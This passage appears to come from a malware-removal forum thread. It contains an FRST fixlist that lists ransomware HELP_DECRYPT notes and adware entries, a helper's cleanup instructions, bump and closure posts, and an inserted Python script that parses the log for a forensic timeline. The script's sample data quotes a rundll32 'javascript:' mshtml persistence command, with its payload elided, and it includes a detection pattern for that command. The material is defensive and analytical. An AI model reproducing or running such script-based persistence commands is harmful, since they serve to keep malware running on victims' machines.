2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\Default User\Local Settings\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\Default User\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\Default User\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\All Users\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\Default User\Local Settings\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\Default User\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\Default User\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\All Users\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\Default User\Local Settings\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\Default User\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\Default User\Application Data\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\All Users\Application Data\HELP_DECRYPT.URL
2015-02-20 15:37 - 2015-02-20 15:37 - 00000480 ____H () C:\Documents and Settings\michelle coe\Application Data\麽鎒駓覜
2015-02-24 23:11 - 2014-09-20 15:42 - 00000000 ____D () C:\Program Files\SearchProtect
2015-02-20 15:44 - 2015-02-20 15:44 - 0008630 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 0045665 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.PNG
2015-02-20 15:44 - 2015-02-20 15:44 - 0004258 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 0000292 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.URL
C:\Documents and Settings\michelle coe\Local Settings\temp\sysrestore.exe
CustomCLSID: HKU\S-1-5-21-484763869-1604221776-1801674531-500_Classes\CLSID\{043AC599-453E-4C44-82B0-6793DE8983C0}\InprocServer32 -> C:\Documents and Settings\All Users\Application Data\{8CCDBBA6-E8EE-4844-9F07-469DCB5F2C87}\secproc. (the data entry has 11 more characters).
Task: C:\WINDOWS\Tasks\PC Performer Scheduled Scan.job => C:\Program Files\PC Performer\PCPerformer.exe <==== ATTENTION
  • Launch FRST and press the Fix button just once and wait, the program will automatically launch fixlist.txt.
  • The tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.
===================================================

System Summary Information

--------------------
  • Press the Windows key + R on your keyboard at the same time
  • Type msinfo32 and press Enter
  • Left click on System Summary
  • Click File, Save, and name the file Summary
  • Zip and attach the file to your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Fixlog
  • System Summary Information

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."
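
Added example (not part of the thread and not FRST's own code): before the fixlist in post #2 is run, its `created - modified - size attrs () path` lines can be read as evidence. This Python script parses them, reports when and where the HELP_DECRYPT notes were dropped, and flags `rundll32.exe javascript:` registry values; the sample lines are shortened copies of entries above, and treating key.dat and log.html under Application Data as ransomware state files is an assumption based on their placement in the fixlist.

```python
import ntpath
import re
from collections import Counter
from datetime import datetime

# FRST file listing: "<created> - <modified> - <size> <attrs> (<company>) <path>"
FILE_LINE = re.compile(
    r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}) - (\d{4}-\d{2}-\d{2} \d{2}:\d{2})"
    r" - (\d+) (\S+) \((.*?)\) (.+)$"
)
# Registry value that starts script through rundll32 + mshtml instead of a file on disk.
SCRIPT_RUNDLL = re.compile(
    r"rundll32(\.exe)?\s+javascript:.*mshtml,\s*RunHTMLApplication", re.I
)
PROFILE_ROOT = "c:\\documents and settings\\"

# Constructed sample: lines shortened from the fixlist above (payload text elided).
SAMPLE = r"""
HKLM\...\LocalServer32: [a] rundll32.exe javascript:"x\..\mshtml,RunHTMLApplication ";eval("...") <==== ATTENTION!
2015-02-24 22:20 - 2015-02-25 03:34 - 00000636 _____ () C:\Documents and Settings\Administrator\Application Data\key.dat
2015-02-20 17:15 - 2015-02-20 17:15 - 00008630 _____ () C:\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\michelle coe\My Documents\HELP_DECRYPT.TXT
2015-02-20 15:46 - 2015-02-20 15:46 - 00000292 _____ () C:\Documents and Settings\michelle coe\Application Data\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.HTML
2015-02-24 23:11 - 2014-09-20 15:42 - 00000000 ____D () C:\Program Files\SearchProtect
S1 exgjfwiw; \??\C:\WINDOWS\system32\drivers\exgjfwiw.sys [X]
"""

def parse_file_entries(text):
    """Return one dict per file-listing line; other fixlist lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = FILE_LINE.match(line.strip())
        if not m:
            continue
        created, modified, size, attrs, _company, path = m.groups()
        entries.append({
            "created": datetime.strptime(created, "%Y-%m-%d %H:%M"),
            "modified": datetime.strptime(modified, "%Y-%m-%d %H:%M"),
            "size": int(size),
            "attrs": attrs,
            "path": path,
        })
    return entries

def profile_of(path):
    """User profile a path belongs to, or None if it is not inside a profile."""
    if not path.lower().startswith(PROFILE_ROOT):
        return None
    rest = path[len(PROFILE_ROOT):].split("\\")
    return rest[0] if len(rest) > 1 else None

def classify(path):
    name = ntpath.basename(path).upper()
    if name.startswith("HELP_DECRYPT."):
        return "ransom_note"
    # Assumption: these names under Application Data are the malware's state files.
    if name in ("KEY.DAT", "LOG.HTML") and "\\application data\\" in path.lower():
        return "state_file"
    return "other"

def summarize(text):
    entries = parse_file_entries(text)
    notes = [e for e in entries if classify(e["path"]) == "ransom_note"]
    state = [e for e in entries if classify(e["path"]) == "state_file"]
    return {
        "first_note": min((e["created"] for e in notes), default=None),
        "last_note": max((e["created"] for e in notes), default=None),
        "note_dirs": len({ntpath.dirname(e["path"]).lower() for e in notes}),
        "notes_per_profile": Counter(
            profile_of(e["path"]) or "(outside profiles)" for e in notes
        ),
        "state_files": sorted(e["path"] for e in state),
        "state_last_written": max((e["modified"] for e in state), default=None),
        "script_persistence": [
            l.strip() for l in text.splitlines() if SCRIPT_RUNDLL.search(l)
        ],
    }

if __name__ == "__main__":
    for key, value in summarize(SAMPLE).items():
        print(f"{key}: {value}")
```

Run against the full fixlist, the note window and the state files' last-written time give a rough timeline to compare with the 2/24/15 modify date reported on the .ecc files.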

#3 Oh My!

Posted 21 March 2015 - 07:44 AM

Greetings,

===================================================

3 Day Bump

It has been more than 3 days since my last post.
  • Do you still need help with this?
  • If after 48hrs you have not replied to this thread then it will have to be closed.

Gary
 

#4 Oh My!

Posted 23 March 2015 - 10:38 AM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.
Gary
 



